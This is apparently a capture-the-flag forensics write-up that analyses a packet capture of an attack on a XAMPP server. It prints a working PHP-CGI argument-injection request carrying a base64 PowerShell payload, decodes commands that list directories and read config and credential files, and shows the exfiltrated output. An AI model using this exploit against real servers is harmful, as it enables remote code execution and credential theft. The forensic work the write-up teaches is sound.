Skip to content

Foggy Intrusion

Scenario

On a fog-covered Halloween night, a secure site experienced unauthorized access under the veil of darkness. With the world outside wrapped in silence, an intruder bypassed security protocols and manipulated sensitive areas, leaving behind traceable yet perplexing clues in the logs.

The challenge archive contains a single file, capture.pcap.

Solution

The PCAP file is a network traffic capture between two hosts, 10.10.10.13 (HTTP server) and 10.10.10.14 (attacker). All traffic is in plain text over HTTP.

Looking through the conversations, it appears the attack is carried out by uploading base64 encoded OS commands. For instance, the first transaction with the server is:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Accept-Encoding: identity
Host: halloweencorp.htb
User-Agent: curl/8.3.0
Accept: /
Content-Length: 636
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php echo shell_exec(base64_decode('cG93ZXJzaGVsbC5leGUgLUMgIiRvdXRwdXQgPSBHZXQtQ2hpbGRJdGVtIC1QYXRoIEM6OyAkYnl0ZXMgPSBbVGV4dC5FbmNvZGluZ106OlVURjguR2V0Qnl0ZXMoJG91dHB1dCk7ICRjb21wcmVzc2VkU3RyZWFtID0gW1N5c3RlbS5JTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgJGNvbXByZXNzb3IgPSBbU3lzdGVtLklPLkNvbXByZXNzaW9uLkRlZmxhdGVTdHJlYW1dOjpuZXcoJGNvbXByZXNzZWRTdHJlYW0sIFtTeXN0ZW0uSU8uQ29tcHJlc3Npb24uQ29tcHJlc3Npb25Nb2RlXTo6Q29tcHJlc3MpOyAkY29tcHJlc3Nvci5Xcml0ZSgkYnl0ZXMsIDAsICRieXRlcy5MZW5ndGgpOyAkY29tcHJlc3Nvci5DbG9zZSgpOyAkY29tcHJlc3NlZEJ5dGVzID0gJGNvbXByZXNzZWRTdHJlYW0uVG9BcnJheSgpOyBbQ29udmVydF06OlRvQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkQnl0ZXMpIg==')); ?>

HTTP/1.1 302 Found
Date: Fri, 13 Sep 2024 21:12:37 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3
X-Powered-By: PHP/8.1.25
Location: http://halloweencorp.htb/dashboard/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

FchbCsAgDAXRrWQF2VN8XzAajLTS1bf9GTiTxFuYshJBK905SMeTFx1RMxKzjigbczi3rZ0C9hAFR3eKcxRUtmZU5MJH/kIYKZ//vg==

The base64 blob decodes to a PowerShell script that lists the contents of the C:\ drive:

1
2
3
4
5
6
7
8
powershell.exe -C "$output = Get-ChildItem -Path C:;
$bytes = [Text.Encoding]::UTF8.GetBytes($output);
$compressedStream = [System.IO.MemoryStream]::new();
$compressor = [System.IO.Compression.DeflateStream]::new($compressedStream, [System.IO.Compression.CompressionMode]::Compress);
$compressor.Write($bytes, 0, $bytes.Length);
$compressor.Close();
$compressedBytes = $compressedStream.ToArray();
[Convert]::ToBase64String($compressedBytes)"

The output from the command is compressed and base64 encoded. According to the documentation, the default compression method used is Gzip.

The data can be decompressed using the Raw Inflate operation in CyberChef:

alt text

The following transactions decode to:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
Get-ChildItem -Path C:\xampp

anonymous apache cgi-bin contrib htdocs img install licenses locale mailoutput mailtodisk mysql php src tmp webdav apache_start.bat apache_stop.bat catalina_service.bat catalina_start.bat catalina_stop.bat ctlscript.bat filezilla_setup.bat filezilla_start.bat filezilla_stop.bat killprocess.bat mercury_start.bat mercury_stop.bat mysql_start.bat mysql_stop.bat passwords.txt properties.ini readme_de.txt readme_en.txt service.exe setup_xampp.bat test_php.bat uninstall.dat uninstall.exe xampp-control.exe xampp-control.ini xampp_shell.bat xampp_start.exe xampp_stop.exe

Get-Content -Path C:\xampp\properties.ini

[General] installdir=C:\xampp base_stack_name=XAMPP base_stack_key= base_stack_version=8.1.25-0 base_stack_platform=windows-x64 [Apache] apache_server_port=80 apache_server_ssl_port=443 apache_root_directory=/xampp/apache apache_htdocs_directory=C:\xampp/htdocs apache_domainname=127.0.0.1 apache_configuration_directory=C:\xampp/apache/conf apache_unique_service_name= [MySQL] mysql_port=3306 mysql_host=localhost mysql_root_directory=C:\xampp\mysql mysql_binary_directory=C:\xampp\mysql\bin mysql_data_directory=C:\xampp\mysql\data mysql_configuration_directory=C:\xampp/mysql/bin mysql_arguments=-u root -P 3306 mysql_unique_service_name= [PHP] php_binary_directory=C:\xampp\php php_configuration_directory=C:\xampp\php php_extensions_directory=C:\xampp\php\ext

Get-Content -Path C:\xampp\htdocs\config.php

<?php define('DB_SERVER', 'db'); define('DB_USERNAME', 'db_user'); define('DB_PASSWORD', 'HTB{FLAG}'); define('DB_DATABASE', 'a5BNadf');  $mysqli = new mysqli(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_DATABASE);  if ($mysqli->connect_error) {     die("Connection failed: " . $mysqli->connect_error); }  $mysqli->set_charset('utf8'); ?>

Got the flag from the last reply above.